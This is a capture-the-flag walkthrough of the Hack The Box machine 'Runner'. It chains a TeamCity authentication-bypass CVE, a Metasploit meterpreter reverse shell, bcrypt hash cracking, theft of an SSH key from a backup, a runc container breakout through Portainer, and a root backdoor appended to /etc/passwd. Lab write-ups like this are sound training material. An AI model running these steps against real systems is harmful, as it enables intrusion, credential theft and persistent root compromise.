Enumeration

As usual, we start off with an nmap scan revealing only 3 ports open:

# Nmap 7.94SVN scan initiated Wed Jul 10 22:16:37 2024 as: nmap -sS -sV -sC -O -oN scan_full.log -p- -T5 -Pn -v 10.129.230.247
Nmap scan report for 10.129.230.247
Host is up (0.11s latency).
Not shown: 65358 closed tcp ports (reset), 174 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesnt have a title (text/plain; charset=utf-8).
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 7.051 days (since Wed Jul  3 21:09:41 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • 22 : Is the standard SSH port running OpenSSH 8.9p1. Nothing stands out as being risky.
  • 80 : Web server without TLS running nginx 1.18 which is not latest but faiirly recent. Nothing too risky here either. We see a redirect to runner.htb which we can add to our /etc/hosts file.
  • 8000: Nagios

Enumerating the web server on port 80 reveals nothing more than a static site talking about offering CI/CD solutions.

Running dirbusting against this web server reveals nothing interesting so we start ffuf to try determining other virtual hosts running on the system:

ffuf -w /opt/SecLists/Discovery/DNS/dns-Jhaddix.txt:FUZZ -u http://runner.htb/ -H 'Host: FUZZ.runner.htb' -t 30 -fs 154

This reveals the subdomain of teamcity and navigating to teamcity.runner.htb reveals the TeamCity application. https://www.jetbrains.com/teamcity/

At the time of writing, I have never used TeamCity but I’m aware of the functionality offered by such a product. It’s in the same realm as something like Jenkins or Azure DevOps. Typically, these programs offer pipelines with scripting functionality where reverse shells can be obtained, or they offer build agents that run scripts during pipeline executions.

This application needs credentials to access and no credentials or users have been found yet.

Continuing on to enumerate the website running on port 8000 reveals nothing else of interest. There is a /health and /version endpoint, but they return only OK and 0.0.0-src respectively. Neither wappalyzer nor whatweb can determine technologies being used for this web application and interrogating the requests with burpsuite doesn’t show anything interesting. This application is probably a dead end just because of how barren and small the attack surface is.

Back at the TeamCity login, we see in the bottom of the login portal a version number: Version 2023.05.3 (build 129390) and doing the old Googling reveals a CVE and a PoC: https://github.com/H454NSec/CVE-2023-42793

This PoC seems to exploit an authentication bypass in the TeamCity API. First a request to delete the existing admin user’s token, DELETE /app/rest/users/id:1/tokens/RPC2 is made then a subsequent request is made to POST /app/rest/users/id:1/tokens/RPC2 to generate a token for this user. Nothing in this process requires credentials, and a token is given back in the response intended to be the admin’s authentication token. This token is then used to create a new user in the PoC.

TeamCity Exploit

I made modifications to the PoC above to send my own username and password and ran it as such:

python3 CVE-2023-42793.py -u http://teamcity.runner.htb/

Which returned a credential with which to login with:

[+] http://teamcity.runner.htb/login.html [pentester5736:Pentester123!]

Logging in didn’t do much good initially as there are no projects set up and only 2 users, John and Matthew. It seems like this is a fresh instance of TeamCity.

More googling reveals that you can get code execution by uploading a malicious plugin to the TeamCity instance. However, doing this manually is unnecessary, as it turns out there is a Metasploit module that uses the above CVE to get a reverse shell for us and handle cleaning up the plugin it uses to do this.

In Metasploit:

use exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793
set RHOSTS <target>
set RPORT 80
set VHOST teamcity.runner.htb
set TARGET 1
set payload payload/cmd/linux/https/x64/meterpreter/reverse_tcp
set LPORT <lport>
set LHOST tun0
run

Running this gives us a reverse shell as the tcuser account. This is not the user account with a flag. This is a docker container containing a TeamCity instance!

Pwning the User

When in the TeamCity portal, poking through settings, there is a warning that says the instance is using the HSQL database and that it should not be used for production.

HSQL stores its data as files inside the system directory of the TeamCity instance. This directory can be found at /data/teamcity_server/datadir/system. Inside this directory, there is a file, buildserver.data that contains some of the DB data. I copied this file back to my machine using the meterpreter session to interrogate it further.

There are a few interesting findings in the data:

  • New SSH key uploaded can be seen indicating there is an SSH key somewhere, but I was not able to find the key in the data, nor could I find one in the file system.
  • matthew $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em Matthew [email protected] Is a bcrypt hash for the matthew user.
  • admin $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye John [email protected] is another bcrypt hash but for the john user, also the admin.

Mathew’s hash can be cracked using hashcat and rockyou but I wasn’t successful at cracking johns and bcrypt is much slower to crack than something like NTLM.

hashcat -O -m 3200 hashes /usr/share/wordlists/rockyou.txt

This gives us the credential of matthew:piper123. Logging in with this via SSH does not work. Logging in to the TeamCity portal as this user is fruitless as well as it has even less capability than our original TeamCity admin account.

The SSH key that was mentioned is the likely way to access the box, and probably as the john user. My understanding from the reading of the TeamCity documentation is that the SSH keys uploaded are for allowing secure communication between the build agents and the TeamCity server. This SSH key being used also for john to log in seems weird, but it’s entirely probable that a lazy, tired or rushed user wouldn’t go through the effort of creating a brand new SSH key, and just use the one they are familiar with. It’s password reuse, but with SSH keys.

Finding the SSH key can’t be done from within the box (as far as I’m aware). As a TeamCity admin via the portal (and even via CLI), it’s possible to trigger a backup which will produce a zip file containing these SSH keys.

Heading to this url, http://teamcity.runner.htb/admin/admin.html?item=backup, allows us to start a backup. Default settings work fine.

The id_rsa file can be found at ./config/projects/AllProjects/pluginData/ssh_keys/id_rsa once the backup zip file is unzipped. There is no protection on the id_rsa so it can be used as-is after running chmod 600 id_rsa on it to protect it so SSH will accept it as authentication. We presume the admin, john uploaded this SSH key and it’s his login credentials which we then prove using ssh -i id_rsa john@$target and we can log in successfully!

Escalation to Root

One of the first things I do when I get on the box to gain better situational awareness is to run netstat -ntlp so that it’s easy to see what ports are listening on the machine that were not publicly open. We immediately see a few that were not available during the initial nmap scan:

Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::8000                 :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -

When I see this, my first thought is to drop the ssh connection, reconnect with a local port forward so I can see what these are.

ssh -L 9000:localhost:9000 -i id_rsa john@$target

Then trigger an nmap scan for this port and attempt to view it in the browser in case it’s a website. Luckily, it’s a Portainer instance which I am familiar with from my time as a developer. Portainer is basically a UI over docker and allows for a visual way of managing containers, images and volumes, etc. Portainer comes with a web UI and manages it’s own separate user accounts from the machine it’s on. These users can then either manage the containers running on that host, or they can manage containers running on other hosts and clusters. It makes managing containers at scale simpler.

Presented with a login screen, but we do not know johns credentials, so we try matthew:piper123 and we see a successful login! Just because of how HTB typically works, given we can log in here and now with these credentials, I deferred any more enumeration of the box. Having an account to log in to Portainer is great because only the Portainer service needs to be a member of the Docker users to run containers. The trust is that users allowed access to Portainer are allowed to deploy and manage containers too. Matthew’s account on Portainer allows us to deploy containers.

My first hope was to be able to deploy a container with the main host’s file system mounted within so I could just read/write to shadow or passwd and gain control that way, but it was not possible.

There are 2 images available in Portainer, the TeamCity image and an Ubuntu image.

After doing more research, I found this article, https://elmaalmi-billal.medium.com/vulnerability-docker-runc-process-cwd-and-leaked-fds-container-breakout-cve-2024-21626-d14ab2e1b53e about abusing the leaked file descriptors from the runc process. Basically, creating a new container whose working directory is /proc/self/fd/8 allows you to access the host file system.

In Portainer, this can be done by logging in, going to Containers > Create Container and setting:

  • Name to be anything, as it identifies the container you will use to exploit the host
  • Image to be ubuntu
  • toggle off Always pull the image (since we don’t have internet access on the machine),
  • Working Dir to be /proc/self/fd/8
  • User to root
  • Console to be Interactive and TTY

Then click Deploy The Container. This will bring you to a screen that lists the running containers. Click the one you created, and then click the >_ Console button to access the container console and finally Connect.

You will be granted a shell in the browser to interact with the Ubuntu container that should have access to the hosts’s file system. To get the root flag, it’s as simple as cat ../../../../../../root/root.txt but ideally, you want shell access. Instead of grabbing the flag here, I tried to grab the root user’s ssh key: cat ../../../../../../../root/.ssh/id_rsa however, this account also requires a password to enter via SSH. Looking at /etc/shadow reveals it’s a yescrypt encrypted password, so it is slow for GPU cracking, and I didn’t feel like cooking my CPU just for this password.

My solution to get full shell access and persistence was to create a password using openssl and append it the /etc/passwd on the host:

openssl passwd <password_here>

echo 'pentester:<hash_from_openssl_above>:0:0:root:/root:/bin/bash' >> ../../../../../../etc/passwd

Now we have full access to the Runner host as a user with root privileges and the machine is complete.

Learnings

  • I spent most of my time in the TeamCity docker container trying to find some way to break out. I had found the matthew account, but wasn’t able to use it’s password anywhere useful at the time and had been unsuccessful cracking the john account password. The key takeaway from this is to spend less time over complicating things; a Docker breakout is way harder than what is more likely just a requirement to enumerate better. Had I done a better job reading the logs, I would have seen the SSH key mentioned earlier and gone down that path quicker.
  • Ideally, I would have enumerated the features of the TeamCity platform better once I had the initial access. I could have conceivably skipped exploring the TeamCity Docker container if I had noticed the backup feature earlier.
  • The runc exploit is so simple to do that it will be one of those things I look for in the future as a quick win for Docker privilege escalation.